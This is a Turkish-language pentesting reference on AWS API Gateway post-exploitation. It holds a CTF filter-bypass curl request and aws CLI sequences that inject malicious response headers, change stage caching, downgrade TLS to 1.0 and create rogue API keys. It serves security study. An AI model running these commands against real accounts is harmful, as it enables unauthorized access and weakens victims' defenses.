AWS - API Gateway Post Exploitation

API Gateway

Daha fazla bilgi için kontrol edin:

Açık olmayan API'lere erişim

https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint adresinde com.amazonaws.us-east-1.execute-api servisi ile bir uç nokta oluşturabilirsiniz, uç noktanızı erişiminiz olan bir ağda (potansiyel olarak bir EC2 makinesi aracılığıyla) açığa çıkarın ve tüm bağlantılara izin veren bir güvenlik grubu atayın. Daha sonra, EC2 makinesinden uç noktaya erişebilecek ve daha önce açığa çıkarılmamış olan gateway API'yi çağırabileceksiniz.

İstek gövdesi geçişini atlatma

Bu teknik bu CTF yazısında bulundu.

AWS belgelerinde PassthroughBehavior bölümünde belirtildiği gibi, varsayılan olarak, WHEN_NO_MATCH değeri, isteğin Content-Type başlığını kontrol ederken, isteği herhangi bir dönüşüm olmadan arka uca iletecektir.

Bu nedenle, CTF'de API Gateway, Content-Type: application/json ile bir istek gönderildiğinde bayrağın dışarı sızmasını engelleyen bir entegrasyon şablonuna sahipti:

RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'

Ancak, Content-type: text/json ile bir istek göndermek bu filtreyi engelleyecektir.

Son olarak, API Gateway yalnızca Get ve Options izin verdiğinden, gövdeye sorguyu koyarak ve X-HTTP-Method-Override: GET başlığını kullanarak sınırsız bir dinamoDB sorgusu göndermek mümkündü:

curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json'  --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'

Kullanım Planları DoS

Enumeration bölümünde anahtarların kullanım planını nasıl edineceğinizi görebilirsiniz. Anahtarınız varsa ve bu anahtar aylık X kullanım ile sınırlıysa, onu kullanabilir ve bir DoS oluşturabilirsiniz.

API Anahtarı sadece x-api-key adlı bir HTTP başlığı içine eklenmelidir.

apigateway:UpdateGatewayResponse, apigateway:CreateDeployment

apigateway:UpdateGatewayResponse ve apigateway:CreateDeployment izinlerine sahip bir saldırgan, özel başlıklar veya hassas bilgileri sızdıran ya da kötü niyetli betikleri çalıştıran yanıt şablonları içerecek şekilde mevcut bir Gateway Yanıtını değiştirebilir.

API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"

# Update the Gateway Response
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Olası Etki: Hassas bilgilerin sızdırılması, kötü niyetli betiklerin çalıştırılması veya API kaynaklarına yetkisiz erişim.

apigateway:UpdateStage, apigateway:CreateDeployment

apigateway:UpdateStage ve apigateway:CreateDeployment izinlerine sahip bir saldırgan, mevcut bir API Gateway aşamasını değiştirebilir, trafiği farklı bir aşamaya yönlendirebilir veya önbellek ayarlarını değiştirerek önbelleğe alınmış verilere yetkisiz erişim elde edebilir.

API_ID="your-api-id"
STAGE_NAME="Prod"

# Update the API Gateway stage
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Olası Etki: Önbelleğe alınmış verilere yetkisiz erişim, API trafiğini kesintiye uğratma veya yakalama.

apigateway:PutMethodResponse, apigateway:CreateDeployment

apigateway:PutMethodResponse ve apigateway:CreateDeployment izinlerine sahip bir saldırgan, mevcut bir API Gateway REST API yönteminin yöntem yanıtını, hassas bilgileri sızdıran veya kötü niyetli betikleri çalıştıran özel başlıklar veya yanıt şablonları içerecek şekilde değiştirebilir.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"

# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potansiyel Etki: Hassas bilgilerin sızdırılması, kötü niyetli betiklerin çalıştırılması veya API kaynaklarına yetkisiz erişim.

apigateway:UpdateRestApi, apigateway:CreateDeployment

apigateway:UpdateRestApi ve apigateway:CreateDeployment izinlerine sahip bir saldırgan, API Gateway REST API ayarlarını güncelleyerek günlüklemeyi devre dışı bırakabilir veya minimum TLS sürümünü değiştirebilir, bu da API'nin güvenliğini zayıflatabilir.

API_ID="your-api-id"

# Update the REST API settings
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER'

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potansiyel Etki: API'nin güvenliğini zayıflatma, yetkisiz erişime veya hassas bilgilerin ifşasına neden olma.

apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey

apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan ve apigateway:CreateUsagePlanKey izinlerine sahip bir saldırgan yeni API anahtarları oluşturabilir, bunları kullanım planlarıyla ilişkilendirebilir ve ardından bu anahtarları API'lere yetkisiz erişim için kullanabilir.

# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')

# Create a new usage plan
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')

# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY

Potansiyel Etki: API kaynaklarına yetkisiz erişim, güvenlik kontrollerinin atlatılması.